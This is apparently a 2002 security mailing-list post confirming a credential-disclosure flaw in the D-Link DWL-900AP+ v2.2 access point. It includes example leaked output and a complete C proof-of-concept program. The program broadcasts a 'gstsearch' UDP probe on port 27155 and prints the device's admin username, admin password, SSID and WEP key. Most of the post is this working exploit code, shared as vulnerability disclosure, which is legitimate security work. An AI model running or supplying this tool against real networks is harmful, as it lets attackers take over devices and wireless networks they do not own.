On Sun, 3 Nov 2002, Tom Knienieder wrote:
Tom Knienieder> Possibly vulnerable, not tested, OEM Version from GlobalSunTech:
Tom Knienieder> D-Link DWL-900AP+ B1 version 2.1 and 2.2
DWL-900AP+ ver 2.2 is vunerable. After changing the test prog (attached)
it returned:
Type : GL2422AP-00-0M0 T1.0 -042.2
Announced Name : DWL-900AP+
Admin Username : admin
Admin Password : secret
SSID : mySSID
Wep KEY : 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d
Don't seem to work on Dlink DI-713P (wlan side)
/håkan
/*
Orig version by Tom Knienieder <knienieder@khamsin.ch>
Patched by Håkan Carlsson <hockey@easylogic.se> for DWL-900AP+ v2.2
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/socket.h>
typedef struct {
char type[32] /* [28] */;
char scr1 [4];
char name[32];
char user[16];
char pass[16];
char scr2 [408];
char ssid [32];
char scr3 [61];
unsigned char wkey [13];
}
__attribute__ ((packed)) answer;
int main()
{
char rcvbuffer[1024];
struct sockaddr_in sin;
answer* ans = (answer *)rcvbuffer;
int sd, ret, val;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr("255.255.255.255");
sin.sin_port = htons(27155);
sd = socket(AF_INET, SOCK_DGRAM, 0);
if (sd < 0)
perror("socket");
val = 1;
ret = setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &val, sizeof(val));
if (ret < 0)
{
perror("setsockopt");
exit(1);
}
ret = sendto(sd, "gstsearch", 9, 0, (const struct sockaddr *)&sin,
sizeof(struct sockaddr));
if (ret < 0)
{
perror("sendto");
exit(1);
}
ret = read(sd,&rcvbuffer,sizeof(rcvbuffer));
printf("Type : %.32s\n",ans->type);
printf("Announced Name : %s\n",ans->name);
printf("Admin Username : %s\n",ans->user);
printf("Admin Password : %s\n",ans->pass);
printf("SSID : %s\n",ans->ssid);
printf("Wep KEY : ");
{
int i = 0;
for (i=0; i<sizeof(ans->wkey); i++) {
printf ("%02x ", ans->wkey[i]);
}
printf ("\n");
}
return 0;
}
